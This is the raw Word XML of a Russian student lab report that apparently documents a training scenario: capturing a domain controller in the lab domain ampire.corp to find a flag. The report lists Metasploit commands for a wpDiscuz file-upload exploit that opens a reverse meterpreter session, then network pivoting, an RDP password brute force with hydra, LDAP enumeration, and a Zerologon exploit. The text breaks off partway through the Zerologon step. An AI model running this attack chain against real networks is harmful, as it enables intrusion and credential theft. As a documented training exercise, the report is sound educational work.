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4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24.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId96.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId99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№4-В.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ЗАХВАТ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">КОНТРОЛЛЕРА</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ДОМЕНА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Кибербезопасность</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">предприятия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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Хрусталев</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Влад</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Гисматуллин</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Артём</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Чесноков</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Артёмий</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Коннова</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Татьяна</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Нефедова</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Наталья</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Уткина</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Алина</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Бансимба</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Клодели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Получить доступ к контроллеру домена и найти флаг в свойствах доменного пользователя «Flag»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">в рамках сценария №3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Исходные данные:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Внешний IP: 195.239.174.11 (атакующая машина)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Целевые хосты:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- WordPress портал: 195.239.174.25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Почтовый сервер: 195.239.174.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Контроллер домена: 10.10.10.20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Домен: ampire.corp</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="32" w:name="этап-1-получение-начального-доступ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Этап 1: Получение начального доступа</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="27" w:name="атака-на-wordpress-портал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1.1 Атака на WordPress портал</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для получения доступа использовалась уязвимость в плагине wpdiscuz (рис. 1):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload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rhosts 195.239.174.25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lhost 195.239.174.11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blogpath /index.php/2021/07/26/hello-world/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1222470"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Уязвимость в плагине wpdiscuz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2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Уязвимость в плагине wpdiscuz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Получена meterpreter-сессия на портале (рис. 2):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; sysinfo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer    : portal</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OS    : Linux portal 4.15.0-173-generic #182-Ubuntu SMP Fri Mar 18 15:53:46 UTC 2022 x86_64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter : php/linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="803170"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="meterpreter-сессия на портале" title="" id="25" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/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3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meterpreter-сессия на портале</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="31" w:name="апгрейд-сесси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1.2 Апгрейд сессии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для улучшения функциональности сессии выполнен апгрейд (рис. 3):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions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2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Получена новая сессия с ID 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3291786"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Получение новой сессии" title="" id="29" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/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Получение новой сессии</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="58" w:name="этап-2-разведка-внутренней-сет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Этап 2: Разведка внутренней сети</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="36" w:name="анализ-сетевых-интерфейсов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Анализ сетевых интерфейсов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выполнена проверка сетевых интерфейсов (рис. 4):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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2169128"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Проверка сетевых интерфейс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сетевых интерфейсов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Обнаружено:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Внутренняя сеть 10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="43" w:name="сканирование-сет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Сканирование сети</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использован модуль ping_sweep для обнаружения активных хостов (рис. 5):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> post/multi/gather/ping_sweep RHOSTS=10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="517694"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Обнаружение активных хостов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Обнаружение активных хостов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Просмотр ARP-таблицы (рис. 6):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">arp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3387126"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Просмотр ARP-таблицы" title="" id="41" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/0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7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ARP-таблицы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Обнаружены multiple хосты во внутренней сети, включая шлюз 10.10.10.254.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="50" w:name="настройка-маршрутизаци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2.3 Настройка маршрутизации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Добавлен маршрут до внутренней сети (рис. 7):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> autoroute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10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1185333"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Добавлен маршрут" title="" id="45" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/0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 маршрут</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Проверка активных маршрутов (рис. 8):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> print</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1236291"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Проверка маршрутов" title="" id="48" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/0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6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маршрутов</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="57" w:name="настройка-socks-прокси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2.4 Настройка SOCKS прокси</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Далее был настроен SOCKS прокси для туннелирования трафика:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конфигурация файла</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/proxychains4.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(рис. 9):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 127.0.0.1 1080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="2242686" cy="972151"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Конфигурация файла" title="" id="52" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/0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686" cy="972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Конфигурация файла</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запуск SOCKS сервера в Metasploit (рис. 10):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary/server/socks_proxy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svhost 127.0.0.1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svport 1080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version 5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3787427"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Запуск SOCKS сервера" title="" id="55" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/0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7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SOCKS сервера</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="94" w:name="этап-3-атака-на-контроллер-домен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Этап 3: Атака на контроллер домена</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="62" w:name="сканирование-портов-контроллера-домен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3.1 Сканирование портов контроллера домена</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выполнено сканирование портов через прокси (рис. 11):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap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--top-ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100 10.10.10.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="5590618"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Сканирование портов через прокси" title="" id="60" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/0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0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Сканирование портов через прокси</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Обнаружены критические порты:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 53/tcp - DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 88/tcp - Kerberos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 389/tcp - LDAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 445/tcp - SMB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- 3389/tcp - RDP</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkStart w:id="66" w:name="атака-перебором-паролей-bruteforc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3.2 Атака перебором паролей (Bruteforce)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На основе информации с сайта об email менеджера, выполнена атака на RDP (рис. 12):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hydra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manager1@ampire.corp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/usr/share/wordlists/rockyou.txt rdp://10.10.10.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3820106"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Атака на RDP" title="" id="64" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/01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0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Атака на RDP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Успешно подобран пароль учетной записи manager1@ampire.corp.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:id="73" w:name="поиск-информации-через-ldap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3.3 Поиск информации через LDAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использованы полученные учетные данные для поиска в Active Directory (рис. 13 - рис. 14):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ldapsearch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ldap://10.10.10.20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"manager1@ampire.corp"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"dc=ampire,dc=corp"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="4944279"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Получение данных" title="" id="68" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/01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4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Получение данных</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Обнаружено:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Пользователь</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">с атрибутом description.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3230319"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Пользователь “Flag” с атрибутом description" title="" id="71" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/0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0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Пользователь</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">с атрибутом description</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkStart w:id="93" w:name="Xfe54b4b5e2ec631c7bde8cea18fafa3057fe75e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3.4 Альтернативный вектор: Эксплуатация Zerologon</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="80" w:name="проверка-уязвимости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3.4.1 Проверка уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использован crackmapexec для проверки уязвимости (рис. 15 - рис. 16):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> crackmapexec smb 10.10.10.20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zerologon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2327478"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="crackmapexec" title="" id="75" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/0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7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crackmapexec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Система уязвима к CVE-2020-1472.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2000834"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Уязвимость" title="" id="78" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="image/016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Уязвимость</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkStart w:id="84" w:name="эксплуатация-уязвимости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3.4.2 Эксплуатация уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запущен модуль Zerologon в Metasploit (рис. 17):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary/admin/dcerpc/cve_2020_1472_zerologon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rhosts 10.10.10.20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nbname AD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
